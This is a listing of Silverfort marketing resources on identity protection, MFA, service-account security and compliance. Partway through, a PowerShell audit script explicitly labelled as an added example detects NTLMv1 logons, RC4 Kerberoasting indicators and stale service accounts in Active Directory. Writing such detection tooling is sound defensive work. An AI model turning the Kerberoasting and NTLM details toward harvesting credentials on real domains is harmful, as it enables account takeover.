In this case study you’ll learn: How Shannon Medical Center implemented MFA protection for all users and resources How they strengthened AD hygiene by having complete visibility into user types and their activity How they gained full visibility and protection of all service accounts --- - Published: 2024-06-03 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/identity-protection-for-financial-services-key-insights-from-the-state-of-the-identity-attack-surface/ Cyberattacks on financial institutions are highly frequent due to the large amount of sensitive financial information and assets they hold. In this eBook, we analyze data on financial services extracted from the State of the Identity Attack Surface report published by Silverfort and Osterman Research. In light of the new data, this eBook examines the different identity protection challenges that financial institutions face, including privileged accounts accessing sensitive information, a lack of visibility into service accounts, and the widespread use of legacy systems. eBook Highlights: 78% of organizations in the financial services sector reported experiencing identity-related breaches Only 2.4% have full visibility into their service accounts 68% rely on financial legacy systems, which prevent them from implementing new identity components Only 32% have unified PAM capabilities across their on-premises and cloud environments --- - Published: 2024-06-03 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/the-role-identity-plays-in-nearly-every-attack-including-ransomware/ Watch this short video about Unified Identity Protection with Silverfort. The common misconception that identity infrastructure and IAM solutions like Active Directory, Okta, or Ping can on their own adequately secure the entire identity infrastructure is to blame for the continued barrage of cyber and ransomware attacks.
Yes, each of these vendors has security controls baked into their solution; however, they cannot extend those controls outside their environments to provide visibility, context, and protection beyond their walls. Attackers use the gaps between these tools to move throughout a company and evade detection. Identity infrastructure remains the most unprotected part of the technology stack and needs dedicated protection, just as organizations already apply to cloud, endpoints, and networks. Watch this conversation with Hed Kovetz, CEO and Co-Founder of Silverfort, as he takes us through why identity security remains the most unprotected part of the security stack, and what needs to change to advance the state of cybersecurity. In collaboration with SC Magazine. https://www.youtube.com/watch?v=1fwrtV-VZZ0 --- - Published: 2024-06-03 - Modified: 2024-09-26 - URL: https://www.silverfort.com/resources/top-identity-protection-challenges-for-manufacturing/ It is common knowledge that manufacturing is one of the most targeted verticals and that threat actors launch data theft and ransomware operations against manufacturing companies daily. What is less commonly known is that the growing share of identity threats within the overall threat landscape collides with security weaknesses unique to this vertical, increasing manufacturers’ risk exposure and the potential damage these attacks can cause. In this resource, you’ll become familiar with the identity threats that manufacturing environments face, get to know the top challenges they encounter when attempting to protect against them, and learn how Silverfort’s Unified Identity Protection platform can help identity and security teams fully address these challenges and keep their environments secure.
--- - Published: 2024-05-30 - Modified: 2025-06-10 - URL: https://www.silverfort.com/resources/womble-bond-dickinson-and-silverfort-case-study/ Womble Bond Dickinson (UK) LLP is a transatlantic law firm that provides the breadth of legal experience and services to meet their clients’ needs across the UK. When their cyber insurance firm enforced stricter MFA prerequisites for policy renewals, WBD sought a solution that would help them comply quickly and easily. In this case study you’ll learn: How Womble Bond Dickinson (UK) complied with MFA requirements How they gained full visibility of their service accounts and insights into all identity data How they achieved all this quickly and easily with Silverfort --- - Published: 2024-05-29 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/west-valley-school-district-silverfort-a-case-study/ West Valley School District Extends MFA Protection to All Faculty Users While Securing Service Accounts West Valley School District 208 strives to help all students become responsible and productive citizens, effective communicators, creative problem-solvers and life-long learners. Recognizing the ongoing risks posed by the evolving threat landscape, West Valley School District’s cyber insurance provider tightened their MFA requirements. At the same time, West Valley School District sought to limit and protect service accounts with excessive privileges within their environments.
In this case study you’ll learn: How West Valley School District gained end-to-end service account protection with access policies How they renewed their cyber insurance policy by complying with new requirements quickly and easily Why they have chosen to partner with Silverfort --- - Published: 2024-05-27 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/leading-telecom-provider-and-silverfort-a-case-study/ Facing many identity protection challenges and aware of their evolving threat landscape, a leading telecom provider’s security team sought a solution that would provide advanced MFA protection capabilities, complete visibility into, and security for, user and authentication requests across their environments. The telecom provider partnered with Silverfort to gain real-time identity security and visibility into user access and authentication requests by extending MFA coverage across all their custom legacy applications and environments. In this case study you’ll learn: How telecom legacy applications can be protected with MFA How all users, including third-party vendors, are protected with MFA policies How to gain complete visibility and risk analysis into every user authentication and access request --- - Published: 2024-05-21 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/advantages-and-limitations-of-mfa-exploring-common-bypass-techniques-and-security-counter-measures/ One of the most commonly recommended identity security controls is to implement MFA for at least those with access to valuable data, if not for absolutely everyone in the organization. However, MFA most definitely isn’t a silver bullet. From simple social engineering methods like MFA prompt bombing or proxied logons to advanced techniques designed to bypass MFA entirely, threat actors are finding ways to leverage compromised credentials despite organizations having MFA in place.
So, how is MFA being bypassed and what can you do about it? In this webinar, we explore MFA’s promises, assumptions, and recent failings. Topics covered include: A look at MFA architecture and various practical ways MFA is implemented today Different ways attackers bypass or avoid MFA protection Controls to gain better visibility into attacker authentication Various ways to improve the state of security around MFA And more --- - Published: 2024-05-01 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/360-mfa-protection-for-ot-environments/ Legacy systems, air-gapped networks, and MFA requirements don’t have to clash. This solution brief introduces how Silverfort delivers true 360° MFA protection for operational technology (OT) environments, without modifying your systems. Industrial organizations are under increasing pressure to comply with standards like the NIST frameworks, NERC CIP, and IEC 62443, but legacy systems often block the path to compliance. Silverfort solves this challenge with a non-intrusive solution that extends MFA to any resource authenticating via Active Directory, even those that never supported it. Whether you’re managing HMI consoles, engineering workstations, or file shares, you’ll gain real-time risk-based protection across your OT infrastructure. It’s everything you need to close compliance gaps, secure AD-connected OT environments, and protect even the “unprotectable.” In this PDF, you’ll learn how to: Enforce MFA on legacy OT systems without rewriting code or disrupting operations. Gain real-time protection against identity-based threats like credential abuse and lateral movement. Comply with industry standards using scalable MFA enforcement. Download the PDF now and see how Silverfort makes industrial-grade identity security practical, and powerful, for OT environments.
--- - Published: 2024-04-30 - Modified: 2025-05-07 - URL: https://www.silverfort.com/resources/solving-educations-key-identity-protection-challenges/ The education sector is an increasingly lucrative target for ransomware and data breaches. Attack volume increased by 179% in 2023, with most attacks involving ransomware operations. Without proper security controls, educational organizations are exposed to significant security challenges, especially against identity-based attacks that utilize compromised credentials. Silverfort enables educational institutions to overcome common identity protection challenges by protecting their identity attack surface and providing real-time protection against ransomware attacks. Download this solution brief to learn: What makes educational institutions a key target for identity threats How Silverfort solves identity security challenges in the education sector --- - Published: 2024-04-30 - Modified: 2025-06-23 - URL: https://www.silverfort.com/resources/five-ways-to-step-up-your-ad-hygiene-with-silverfort/ Keep your Active Directory clean, secure, and attack-resilient Your Active Directory (AD) is a goldmine for attackers, and one weak link can open the door to serious breaches. That’s why maintaining strong AD hygiene should be a critical pillar of your cybersecurity strategy. In this quick guide, 5 Ways to Step Up Your AD Hygiene with Silverfort, we walk you through practical, real-world strategies to close security gaps and proactively harden your AD environment. From identifying hidden threats like shadow admins to eliminating legacy protocols and overlooked misconfigurations, we'll run through actionable insights backed by real customer success stories. Whether you're tackling legacy risks or modern threats, this guide shows you how Silverfort helps you detect, monitor, and respond—without disrupting business operations. No guesswork. No heavy lifting. Just better AD security. 
In this guide, you’ll learn how to: Uncover hidden admin accounts (aka shadow admins) and misconfigurations that could silently expand your attack surface. Identify and eliminate risky practices, such as NTLMv1 usage and stale service accounts that go undetected in native tools. Defend against stealthy identity-based attacks, like Kerberoasting and Print Spooler exploits, before they escalate. If your AD is at the heart of your network (and let’s face it, it probably is), this is your blueprint for keeping it lean, clean, and secure. --- - Published: 2024-04-22 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/todays-top-4-identity-security-threat-exposures-are-you-vulnerable/ When it comes to identity protection, we often focus on what's visible above the surface – the user accounts and configurations we're familiar with. Armed with this understanding, we can develop and deploy defenses against identity threats. Yet, beneath this familiar landscape lies a concealed realm of Identity Threat Exposures (ITEs). These underground vulnerabilities encompass misconfigurations, forgotten user accounts, legacy settings, malpractices, and insecure built-in features. Serving as insider collaborators for attackers, ITEs provide a convenient pathway to access credentials, escalate privileges, and maneuver laterally, whether on-premises or in the cloud. This webinar sheds light on findings from a report by Silverfort, illuminating the most critical identity security weaknesses within the hybrid enterprise environment. Our objective is to empower security teams with actionable insights derived from this webinar, enabling them to identify and address crucial weaknesses effectively. 
Key topics covered include: The top four identity security threat exposures today and their repercussions How shadow admins facilitate attackers in compromising the SaaS environment Vulnerabilities associated with service accounts and strategies for mitigation Recommendations for bridging the gap in identity security weaknesses And more --- - Published: 2024-04-14 - Modified: 2025-03-11 - URL: https://www.silverfort.com/resources/the-silverfort-identity-ir-playbook/ An organization’s Incident Response Plan (IRP) is the set of processes security teams follow to respond to an attack. It usually includes determining the attack’s scope, containing it to prevent further spread, and eradicating adversarial presence and activity. While there is an established IR playbook for the malware and network aspects of cyberattacks, the identity aspect is lacking: there are no common procedures to identify compromised user accounts and prevent attackers from using them to spread within the targeted environment rapidly and efficiently. Download this eBook to learn: What is the identity aspect of incident response Silverfort’s playbook for identity IR success How to implement Silverfort’s IR playbook during active security incidents --- - Published: 2024-04-08 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/solving-identity-protection-gaps-in-education-environments/ The education sector, including both K-12 and higher education, continues to be a prime target for cyberattacks. Attack volume increased by 179% in 2023 over the previous year, with the majority of attacks consisting of ransomware operations. Ransomware attacks use compromised credentials to spread throughout target environments. The continued success of this mode of operation highlights critical weaknesses in education organizations’ security architecture.
Download this eBook to learn: The different identity protection challenges that educational institutions encounter Why traditional identity solutions are ineffective for defending against identity threats How Silverfort can empower you with end-to-end identity protection across your environments --- - Published: 2024-03-26 - Modified: 2025-07-17 - URL: https://www.silverfort.com/resources/the-identity-threat-exposures-report/ Your defenses are sky-high, but underground you’re exposed. When it comes to identity protection, the user accounts and configurations we’re aware of lie in full view above ground, so we can defend them effectively against identity threats. Unfortunately, this aboveground knowledge is painfully limited. Beneath the known identity attack surface exists an underground world of misconfigurations, forgotten user accounts, legacy settings, malpractices, and insecure built-in features. In this report we refer to these as Identity Threat Exposures (ITEs). Attackers use these ITEs as co-conspirators to perform credential theft, privilege escalation and lateral movement. What’s more, due to the common practice of syncing AD user accounts to the cloud IdP, this underground exposure could also provide attackers with direct access to your SaaS environment. We took a deep dive into the prevalence and severity of ITEs in hundreds of live production environments, and this is what we discovered: 67% of organizations exposed their SaaS apps to compromise with insecure on-prem password sync. 37% of admins authenticate in NTLM, exposing challenge-response material that attackers can capture and crack offline to recover cleartext passwords. 109 new shadow admins are, on average, introduced by a single AD misconfiguration, enabling attackers to reset a true admin’s password. 31% of all users are service accounts with high access privileges and low visibility.
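The AD hygiene guide above names NTLMv1 usage, stale service accounts and Kerberoasting as the exposures to hunt for, and the ITE report findings just listed quantify NTLM use by admins and the prevalence of high-privilege service accounts. As an added example (not Silverfort code, and not taken from any of the resources listed here), the PowerShell audit below checks a Windows domain for those three indicators using only native Security-log events and the ActiveDirectory module. The 7-day event lookback and 90-day staleness threshold are assumptions; adjust them to your environment.

```powershell
# Added example (not Silverfort code): audit a Windows domain for three exposures
# named in the resources above: NTLMv1 logons, RC4 service-ticket requests (the
# classic Kerberoasting indicator) and stale service accounts.
# Run on a domain controller, or point the log functions at an exported .evtx via -Path.
# Assumptions: a 7-day event lookback and a 90-day staleness threshold.

function Get-EventDataMap {
    # Flatten the <EventData><Data Name="..."> nodes of a Security event into a hashtable.
    param([Parameter(Mandatory)][System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $map = @{}
    $xml = [xml]$Event.ToXml()
    foreach ($d in $xml.Event.EventData.Data) {
        if ($d.Name) { $map[$d.Name] = $d.'#text' }
    }
    return $map
}

function Get-SecurityEvents {
    # Read events by ID from the live Security log or from an exported .evtx file.
    param([int[]]$Id, [datetime]$Since, [string]$Path)
    $filter = @{ Id = $Id; StartTime = $Since }
    if ($Path) { $filter.Path = $Path } else { $filter.LogName = 'Security' }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
}

function Find-NtlmV1Logons {
    # Event 4624 records the NTLM flavour in LmPackageName. 'NTLM V1' responses can be
    # cracked offline to the NT hash, which is why these logons are worth eliminating.
    param([datetime]$Since = (Get-Date).AddDays(-7), [string]$Path)
    foreach ($e in Get-SecurityEvents -Id 4624 -Since $Since -Path $Path) {
        $d = Get-EventDataMap $e
        if ($d['LmPackageName'] -eq 'NTLM V1') {
            [pscustomobject]@{
                Time      = $e.TimeCreated
                Account   = "$($d['TargetDomainName'])\$($d['TargetUserName'])"
                Source    = $d['IpAddress']
                LogonType = $d['LogonType']
            }
        }
    }
}

function Find-KerberoastIndicators {
    # Event 4769: a successful TGS request with TicketEncryptionType 0x17 (RC4-HMAC) for a
    # user-account SPN is the classic Kerberoasting signature. Computer accounts (names
    # ending in '$') and krbtgt are excluded to cut noise.
    param([datetime]$Since = (Get-Date).AddDays(-7), [string]$Path)
    foreach ($e in Get-SecurityEvents -Id 4769 -Since $Since -Path $Path) {
        $d = Get-EventDataMap $e
        $svc = $d['ServiceName']
        if ($d['TicketEncryptionType'] -eq '0x17' -and $d['Status'] -eq '0x0' -and
            $svc -notmatch '\$$' -and $svc -ne 'krbtgt') {
            [pscustomobject]@{
                Time      = $e.TimeCreated
                Requester = $d['TargetUserName']
                Service   = $svc
                Source    = $d['IpAddress']
            }
        }
    }
}

function Find-StaleServiceAccounts {
    # Enabled user accounts that carry an SPN (i.e. are used as service accounts) but have
    # not logged on within the threshold. Requires the ActiveDirectory module (RSAT or a DC).
    param([int]$InactiveDays = 90)
    Import-Module ActiveDirectory -ErrorAction Stop
    $cutoff = (Get-Date).AddDays(-$InactiveDays)
    Get-ADUser -Filter { Enabled -eq $true -and ServicePrincipalName -like '*' } `
               -Properties LastLogonDate, PasswordLastSet, ServicePrincipalName |
        Where-Object { -not $_.LastLogonDate -or $_.LastLogonDate -lt $cutoff } |
        Select-Object SamAccountName, LastLogonDate, PasswordLastSet,
                      @{ n = 'SPNs'; e = { $_.ServicePrincipalName -join ';' } }
}

# Usage on a domain controller: summarise by account so the noisiest sources surface first.
Find-NtlmV1Logons         | Group-Object Account   | Sort-Object Count -Descending | Format-Table Count, Name
Find-KerberoastIndicators | Group-Object Requester | Sort-Object Count -Descending | Format-Table Count, Name
Find-StaleServiceAccounts | Format-Table -AutoSize
```

Three caveats a practitioner should keep in mind. Each domain controller keeps its own Security log, so run the event functions on every DC (or against forwarded logs) before concluding that NTLMv1 is gone; only then is it safe to enforce a deny policy or raise LmCompatibilityLevel to 5 (send NTLMv2 only, refuse LM and NTLM). RC4 service-ticket requests also occur legitimately for accounts that have no AES keys or from old clients, so treat the 4769 hits as leads to triage by requester and volume, not as verdicts. LastLogonDate is derived from the replicated lastLogonTimestamp attribute, which can lag the real last logon by up to 14 days, so keep the staleness threshold comfortably above that.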
--- - Published: 2024-03-19 - Modified: 2024-09-26 - URL: https://www.silverfort.com/resources/securing-service-accounts-with-silverfort/ Watch this short video about Unified Identity Protection with Silverfort. Discover, monitor and protect service accounts with fully automated visibility, risk analysis and adaptive Zero Trust policies, without requiring password rotation. --- - Published: 2024-03-12 - Modified: 2025-06-23 - URL: https://www.silverfort.com/resources/silverforts-deny-access-policies/ Stop threats before they can start with deny access policies that actually work When it comes to identity threats, speed matters. The ability to automatically block access—right as it happens—is one of the most effective defenses against compromised credentials, misconfigurations, and malicious behavior. That’s exactly what Silverfort’s Deny Access Policies deliver. This solution brief shows how Silverfort gives organizations real-time, precision control over access across all users, devices, protocols, and environments. Whether it’s a suspicious NTLMv1 login attempt or an unauthorized user accessing from an insecure location, Silverfort can shut it down before damage is done. You’ll also learn how easy it is to define and enforce policies based on your conditions, like risk level, user privilege, time of day, or device hygiene, without any custom scripts or complex integrations. In this guide, you’ll learn how to: Block risky authentication attempts (like NTLMv1) automatically to neutralize known attack techniques. Segment access by role, protocol, or context, denying connections from high-risk locations or non-compliant devices. Contain threats proactively by enforcing real-time deny policies—even for privileged users and service accounts. 
--- - Published: 2024-03-11 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/breaking-through-mfa-barriers-in-oil-gas-air-gapped-networks/ Today’s interconnected world has made the cybersecurity landscape increasingly complex, particularly for industries such as oil and gas. Ransomware attacks have increased in frequency in this sector, causing serious concerns about the security of its operational technology (OT) networks. Silverfort helps oil and gas organizations protect their identity attack surface by mitigating ransomware risk and extending MFA protection to all resources in their IT and OT environments. Download this solution brief to learn: What makes oil & gas companies a key target for identity threats How air-gapped networks can be exposed to ransomware How Silverfort solves oil & gas identity security challenges --- - Published: 2024-03-01 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/building-an-incident-response-playbook-against-scattered-spider-in-real-time/ In late 2023, the Scattered Spider threat group attacked the networks of several major financial and insurance entities, resulting in one of the largest and most impactful ransomware attacks in recent memory. By gaining access to these networks through social engineering, the group bypassed multi-factor authentication (MFA) by obtaining login credentials and one-time passwords. Silverfort's threat research team has dealt closely with the identity techniques used by Scattered Spider, and built a response playbook in real time while responding to an active Scattered Spider attack. This webinar dissects the real-life scenario in which the team was called upon to build and execute a response plan while attackers were moving inside an organization's hybrid environment.
Topics covered include:
- Analysis of the Scattered Spider attack
- The steps taken in real-time by Silverfort to stop all lateral movement by Scattered Spider
- Why identity threat IR tools and practices are more critical than ever
- And more

---
- Published: 2024-02-29
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/how-silverfort-secures-former-employee-accounts/

Many organizations spend a lot of time onboarding new employees and making sure they have access to everything they need; however, the same care is often lacking when it comes to offboarding. Unfortunately, attackers are known to compromise unmonitored leaver accounts, opening organizations up to significant risk.

Download this solution brief to learn:
- Which risks are opened up by ex-employee accounts and stale users
- How to gain complete visibility into all stale users
- How to use Silverfort policies to protect your organization against compromised leaver accounts.

---
- Published: 2024-02-16
- Modified: 2025-02-27
- URL: https://www.silverfort.com/resources/identity-protection-for-ny-dfs-part-500/

In this white paper, we explore how Silverfort enables organizations that are subject to NY-DFS cybersecurity regulation to fully meet its MFA and privileged access management requirements, as well as the identity aspect of threat detection and response.

Download this whitepaper to learn:
- About the NY-DFS Part 500
- How compliance with NY-DFS Part 500 can significantly strengthen your organization’s security posture
- How Silverfort can enable compliance quickly and easily

---
- Published: 2024-02-16
- Modified: 2025-06-23
- URL: https://www.silverfort.com/resources/pci-dss-v4-compliance-with-silverfort-identity-protection/

Get PCI DSS v4.0 ready—faster, smarter, and without the headache

PCI DSS 3.2.1 is officially retired, and version 4.0 is now the new standard for safeguarding cardholder data. If your organization needs to meet the latest requirements (and fast), this whitepaper is for you.
We'll break down how Silverfort helps you meet key controls with less complexity—especially when it comes to identity and access management.

In this whitepaper, you’ll discover how to:
- Meet updated MFA and password requirements with advanced protection for on-prem, remote, and legacy access—all without disrupting users.
- Simplify access reviews by continuously monitoring all authentications across human, service, and third-party accounts.
- Harden your environment with least-privilege enforcement, detection of credential abuse, and real-time blocking of lateral movement.
- Easily comply with PCI DSS v4.0's identity security requirements.

---
- Published: 2024-02-16
- Modified: 2025-07-01
- URL: https://www.silverfort.com/resources/comply-with-digital-operational-resilience-act-requirements-with-silverfort/

Make DORA compliance simple and secure with Silverfort

Financial institutions and critical ICT providers across the EU must now meet new, rigorous cybersecurity standards. This solution brief breaks down what DORA demands—and shows how Silverfort helps you meet those requirements efficiently, effectively, and with minimal disruption. From identity asset discovery to strong authentication, activity monitoring, and access control, Silverfort provides out-of-the-box alignment with key DORA articles, including Articles 8, 9, and 10. You’ll also find a helpful compliance table mapping specific DORA requirements to Silverfort’s capabilities. If you’re preparing for DORA—or just want to strengthen your IT risk posture—this guide is a must-read.

In this PDF, you’ll learn how to:
- Map and monitor all identities and systems to meet Article 8’s visibility and risk assessment mandates.
- Enforce access controls and MFA across legacy, on-prem, and cloud environments in line with Article 9.
- Detect anomalous activity in real time and meet continuous monitoring expectations under Article 10.
Download the PDF to see how Silverfort simplifies DORA compliance without slowing down your business.

---
- Published: 2024-02-16
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/comply-with-ccop-identity-protection-requirements-with-silverfort/

In this solution brief, we explore how Silverfort enables operators of critical infrastructure in Singapore to align with the updated requirements of CCOP across MFA, privileged access, account management and Domain Controller protection.

Download this solution brief to learn:
- About the Cybersecurity Code of Practice (CCOP) for Critical Information Infrastructure 2.0
- How to gain full coverage of CCOP identity protection requirements

---
- Published: 2024-02-15
- Modified: 2025-05-12
- URL: https://www.silverfort.com/resources/facing-and-overcoming-retail-identity-protection-challenges/

As retailers compete in an increasingly competitive marketplace, they invest a great deal of resources in becoming household names. But brand recognition is a double-edged sword when it comes to cybersecurity, because the bigger your name, the bigger the cyber target on your back. Silverfort enables retailers to overcome common identity protection challenges by mitigating ransomware risk, gaining visibility across all users and service account activity, and extending MFA protection to all resources.

Download this solution brief to learn:
- Why retailers are a key target for identity threats
- How Silverfort solves key retail identity protection challenges

---
- Published: 2024-02-14
- Modified: 2024-10-22
- URL: https://www.silverfort.com/resources/identity-attack-surface-key-weakness-analysis-redux-shifting-from-on-prem-to-cloud/

It’s no surprise that modern cyberattacks are looking for ways to move laterally both within an on-premises environment, as well as over to an organization’s cloud-based services, applications, and resources.
With almost every environment leveraging some form of hybrid configuration, any identity credentials that are susceptible to hacking techniques provide an attacker with potentially unfettered access to both the cloud and on-prem environment. And why is it so easy for an elevated identity to be compromised? Weaknesses in your identity configuration, management, and monitoring are likely the cause. Think beyond just an insecure password – undocumented or forgotten accounts, permissions, and delegations; a lack of additional authentication factors; standing privileges; and more, all plague most organizations (because we’re all so focused on dealing with the “next” issue). It’s these weaknesses that cybercriminals look for and take advantage of... all because they know you haven’t addressed them.

In this webinar, Yiftach Keshet, VP of Product Marketing at Silverfort, takes a deeper dive into the common identity security gaps that exist in on-premises environments that enable threat actors to also access SaaS-based applications and platforms. Up first, 4-time Microsoft MVP Nick Cavalancia discusses why identity continues to be a primary attack surface, using the MITRE ATT&CK Framework to demonstrate how nearly every action taken inevitably traces back to a weak identity attack surface. Up next, Yiftach dives into the most common security gaps, showing how they can be used to provide access to on-prem and cloud environments alike. These include:
- How adversaries abuse on-prem weaknesses to move laterally to and compromise the cloud environment: gaining initial access to a machine, then using either an NTLM path or a Kerberos path to gain access to cloud environments.
- Identifying users with excessive access privileges: 1 out of 7 users (on average) has access privileges similar to those of admins despite not being included in any admin group. Naturally there's also no protection for these users, as no one knows that they are de-facto privileged. Attackers can take their chance and target these users for “under the radar” lateral movement.
- Stale accounts and shared accounts: common malpractice that creates a huge attack surface. Stale accounts are not protected (more than 15% of all users in many cases). Shared accounts can't be protected with MFA. Both types are extensively targeted.

Yiftach also demonstrates how it’s possible to detect these types of attacks, and discusses best practices for mitigating identity weaknesses through security controls that include multi-factor authentication and identity segmentation.

---
- Published: 2024-02-13
- Modified: 2025-05-27
- URL: https://www.silverfort.com/resources/identity-protection-in-healthcare-challenges-and-solutions/

Identity threats are frequently targeted at healthcare organizations, resulting in serious injuries and disruptions to emergency services. Silverfort provides unified identity protection for healthcare with full visibility into service accounts, MFA for all medical devices and information systems, and custom access policies.

Download this solution brief to learn:
- Why healthcare organizations face so many identity threats
- How Silverfort identifies and manages service accounts and extends MFA to all healthcare systems
- How to detect and respond to identity threats in real time

---
- Published: 2024-02-13
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/westminster-school-with-data3/

Westminster School finds “missing piece” of security strategy with Data#3 and Silverfort

Westminster School counts cyber security among the most critical responsibilities of its IT department. The school wanted to minimise risk exposure by strengthening protection around legacy applications and systems. After their IT leaders attended a cyber security session at Data#3’s annual JuiceIT event, they realised they had found the ‘missing piece’ to secure their environment.
In this case study you’ll learn:
- How Westminster School worked with Data#3 and Silverfort to secure their environment
- How they achieve full visibility of privileged and service accounts
- How they extended MFA to legacy systems
- How they significantly improved their cybersecurity maturity and posture

---
- Published: 2024-01-17
- Modified: 2025-05-19
- URL: https://www.silverfort.com/resources/state-of-emergency-identity-security-blind-spots-endanger-healthcare-services/

Healthcare organizations are among the most targeted sectors for identity-related attacks as they utilize a wide range of systems and employ different security practices for each. Healthcare organizations are currently faced with very complex identity infrastructures, little to no visibility into their large numbers of service accounts, and a lack of ability to protect their legacy systems and medical devices.

In this eBook, you'll learn:
- Why healthcare organizations are unable to find effective solutions to protect themselves against identity-related attacks.
- What the current approaches are and why they are highly limited.
- How to identify, monitor, and protect all resources within the complex environment of healthcare organizations, including user accounts, service accounts and legacy devices.

---
- Published: 2024-01-15
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-for-pingone-davinci/

Want to instantly act on identity threats—without writing a single line of code? This PDF introduces the powerful integration between Silverfort and PingOne DaVinci, Ping Identity’s no-code orchestration platform. Together, they let you automatically detect and respond to identity-based attacks—like lateral movement, account takeovers, and brute force—in real time. With Silverfort’s identity risk engine feeding into your DaVinci workflows, you can build automated flows that adapt based on user risk levels, trigger MFA, and initiate webhooks for critical responses.
It’s a smarter way to turn identity data into real-time protection, all within a visual interface your teams already use. Whether you're securing complex hybrid environments or simplifying SOC operations, this integration makes identity protection dynamic, responsive, and intuitive.

In this PDF, you’ll learn how to:
- Ingest real-time risk signals from Silverfort into DaVinci and use them to drive automated identity workflows.
- Trigger precise security actions like MFA challenges or webhook alerts based on live authentication risk.
- Gain full visibility and context into every access attempt across cloud and on-prem identities—all in one place.

Download the PDF now to see how Silverfort and PingOne DaVinci transform identity protection from passive to proactive.

---
- Published: 2024-01-04
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/frequently-asked-questions-about-silverfort-and-azure-marketplace/

Purchasing Silverfort through the Azure Marketplace allows for a streamlined procurement process, allowing you to leverage your existing procurement relationship with Microsoft.

Download this solution brief to learn:
- The benefits of purchasing Silverfort via the Azure Marketplace
- All you need to know about the Microsoft Azure Consumption Commitment (MACC)
- How to know if your company has MACC

---
- Published: 2024-01-04
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-and-servicenow-integration/

What if your service accounts could protect themselves—without system changes or manual oversight? This PDF explains how Silverfort’s native integration with ServiceNow makes that possible. By syncing data from ServiceNow’s CMDB, Silverfort automatically discovers, monitors, and protects every service account across your hybrid environment. It applies risk-based access policies to each account—without system changes.
Silverfort continuously analyzes behavior, detects anomalies, and blocks suspicious activity—closing one of the most overlooked attack vectors in the enterprise: compromised service accounts. If you’re struggling with service account sprawl, orphaned credentials, or inconsistent governance, this integration offers a fully automated, intelligent solution.

In this PDF, you’ll learn how to:
- Automatically discover and protect all service accounts managed through ServiceNow.
- Enforce adaptive access policies that block suspicious activity based on behavioral deviations.
- Deploy without disruption, using protection that doesn’t require app modification or password rotation.

Download the PDF now to see how Silverfort and ServiceNow deliver effortless security for the accounts no one’s watching—but attackers love to exploit.

---
- Published: 2023-12-21
- Modified: 2025-05-27
- URL: https://www.silverfort.com/resources/securing-manufacturing-environments-with-mfa-2/

Manufacturers are more connected than ever, with a rapidly increasing number of manufacturing environments shifting from local user access to HMI, engineering workstations, and production apps to centralized SSO via Active Directory (AD). While the productivity advantages of this transition are clear, it also exposes their environments to a wide range of identity threats that leverage the same AD infrastructure for malicious resource access.
Download this solution brief to learn:
- The different identity security risks that manufacturers face
- Why traditional MFA and other common solutions do not provide the level of protection required
- How Silverfort can empower you with end-to-end identity protection across your environments

---
- Published: 2023-12-15
- Modified: 2025-08-21
- URL: https://www.silverfort.com/resources/building-an-incident-response-playbook-on-the-fly-against-scattered-spider-lateral-movement/

By now, you’ve likely heard about the largest - and possibly the most impactful - ransomware attack in recent memory when the Scattered Spider threat group attacked the networks of multiple major financial and insurance entities. Gaining access to these networks through social engineering, the group bypassed multi-factor authentication by attaining login credentials and one-time passwords. Silverfort’s threat research team has interacted closely with the identity threats used by Scattered Spider and in fact, built a response playbook in real-time to respond to an active Scattered Spider attack. This webinar - featuring Yaron Kassner, CTO and Co-Founder and Yiftach Keshet, VP of Product Marketing of Silverfort - dissects the real-life scenario in which they were called to build and execute a response plan while attackers were moving inside an organization’s hybrid environment.

View this webinar to learn more about:
- The history of Scattered Spider
- Aligning Scattered Spider’s actions to the MITRE ATT&CK Framework
- The steps taken in real-time by Silverfort to stop all lateral movement by Scattered Spider
- And much more

---
- Published: 2023-12-13
- Modified: 2025-07-31
- URL: https://www.silverfort.com/resources/what-is-silverforts-cyber-insurance-assessment/

Struggling to meet identity-related cyber insurance requirements? Silverfort’s free assessment can help you bridge the gap—fast.
This whitepaper introduces Silverfort’s Cyber Insurance Identity Assessment, a tool designed to give organizations a clear, actionable view of where they stand when it comes to meeting insurer expectations. It helps you uncover all admin and privileged accounts—even those you don't know about—and provides visibility into service accounts, password hygiene, and suspicious behavior across your identity infrastructure. Whether you're renewing a policy or preparing for your first one, this assessment gives you everything you need to meet MFA requirements, fix identity security gaps, and prevent breaches before they become insurance claims.

In this whitepaper, you’ll learn how to:
- Identify unprotected admin and service accounts and bring them under MFA coverage.
- Expose hygiene issues like non-expiring passwords, Kerberoasting risk, and legacy protocol use.
- Spot active identity threats like brute force, lateral movement, and credential misuse.

Download the whitepaper now to learn how Silverfort makes identity compliance for cyber insurance simple, fast, and effective, so you can secure your coverage and your environment.

---
- Published: 2023-12-10
- Modified: 2025-05-09
- URL: https://www.silverfort.com/resources/cyber-essentials-and-cyber-essentials-plus/

In this white paper, you will learn how organisations can integrate the Silverfort Unified Identity Protection platform to comply with the Cyber Essentials and Cyber Essentials Plus certification assessment per its latest update in April 2021.
Read this whitepaper to learn:
- About the Cyber Essentials and Cyber Essentials Plus certifications
- How compliance with Cyber Essentials can significantly strengthen security posture
- How Silverfort can enable compliance quickly and easily

---
- Published: 2023-12-03
- Modified: 2024-10-03
- URL: https://www.silverfort.com/resources/overcoming-the-security-blind-spots-of-service-accounts/

In today’s rapidly evolving cybersecurity landscape, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot – and a veritable goldmine for attackers.

Download this eBook to learn:
- How real-time protection of service accounts can prevent lateral movement and block ransomware propagation
